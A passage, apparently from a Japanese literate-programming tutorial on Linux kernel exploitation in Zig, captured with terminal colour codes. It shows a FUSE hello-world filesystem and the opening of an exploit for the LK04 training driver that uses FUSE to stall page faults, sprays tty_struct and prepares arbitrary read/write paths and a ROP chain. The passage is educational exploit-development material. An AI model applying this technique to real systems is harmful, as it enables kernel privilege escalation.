�[1m�[37m �[0m�[1m�[37mexe�[0m�[1m�[37m.�[0m�[37mlinkSystemLibrary�[0m�[1m�[37m(�[0m�[33m"pthread"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mexe�[0m�[1m�[37m.�[0m�[37mlinkSystemLibrary�[0m�[1m�[37m(�[0m�[33m"dl"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mb�[0m�[1m�[37m.�[0m�[37minstallArtifact�[0m�[1m�[37m(�[0m�[1m�[37mexe�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
(FUSEのZigバインディングはこち [6])
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"fuse29.zig"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mcontent�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33m"Hello world!�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mgetattrCallback�[0m�[1m�[37m(�[0m�[1m�[37mpath�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mStat�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"getattrCallback"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m5�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"/file"�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstbuf�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mst�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mst�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mzeroInit�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mStat�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mIFREG�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mnlink�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mcontent�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mE�[0m�[1m�[37m.�[0m�[1m�[37mNOENT�[0m�[1m�[37m)));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mopenCallback�[0m�[1m�[37m(�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_file_info�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"openCallback"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mreadCallback�[0m�[1m�[37m(�[0m�[1m�[37mpath�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37msize�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_file_info�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"readCallback"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m5�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"/file"�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37moffset�[0m�[1m�[37m �[0m�[1m�[36m>=�[0m�[1m�[37m �[0m�[1m�[37mcontent�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mlength�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@min�[0m�[1m�[37m(�[0m�[1m�[37mcontent�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37moffset�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37msize�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mlength�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mcontent�[0m�[1m�[37m[�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37moffset�[0m�[1m�[37m))..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mlength�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37mlength�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mE�[0m�[1m�[37m.�[0m�[1m�[37mNOENT�[0m�[1m�[37m)));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mzeroes�[0m�[1m�[37m(�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_operations�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m.�[0m�[1m�[37mgetattr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mgetattrCallback�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m.�[0m�[1m�[37mopen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mopenCallback�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mreadCallback�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mtmp�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmkdir�[0m�[1m�[37m(�[0m�[33m"/tmp/test"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfargs�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_args�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mchan�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_mount�[0m�[1m�[37m(�[0m�[33m"/tmp/test"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mfargs�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mFuseMountError�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_unmount�[0m�[1m�[37m(�[0m�[33m"/tmp/test"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mchan�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_new�[0m�[1m�[37m(�[0m�[1m�[37mchan�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mfargs�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mfops�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@TypeOf�[0m�[1m�[37m(�[0m�[1m�[37mfops�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mFuseNewError�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_set_signal_handlers�[0m�[1m�[37m(�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_get_session�[0m�[1m�[37m(�[0m�[1m�[37mf�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[37mfuse_loop_mt�[0m�[1m�[37m(�[0m�[1m�[37mf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m[INFO] getattrCallback�[0m
�[1m�[37m[INFO] openCallback�[0m
�[1m�[37m[INFO] readCallback�[0m
�[1m�[37mHello world!�[0m
さて、(悪)用しよう:
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpin�[0m�[1m�[36m-�[0m�[1m�[37mto�[0m�[1m�[36m-�[0m�[1m�[37mcore�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mtty_struct�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk04�[0m�[1m�[36m-�[0m�[1m�[37mtypes�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk04�[0m�[1m�[36m-�[0m�[1m�[37mropchain�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfuse�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"fuse29.zig"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mgetattrCallback�[0m�[1m�[37m(�[0m�[1m�[37mpath�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mStat�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m4�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"/aar"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mor�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37meql�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpath�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m4�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33m"/aaw"�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstbuf�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mst�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mst�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mzeroInit�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mStat�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mIFREG�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mnlink�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mE�[0m�[1m�[37m.�[0m�[1m�[37mNOENT�[0m�[1m�[37m)));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mopenCallback�[0m�[1m�[37m(�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_file_info�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfleck_fd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m10�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mblob_buf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m1024�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mreadCallback�[0m�[1m�[37m(�[0m�[1m�[37mpath�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37msize�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[1m�[37mfuse�[0m�[1m�[37m.�[0m�[1m�[37mfuse_file_info�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mENOENT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mE�[0m�[1m�[37m.�[0m�[1m�[37mNOENT�[0m�[1m�[37m)));�[0m�[1m�[37m�[0m
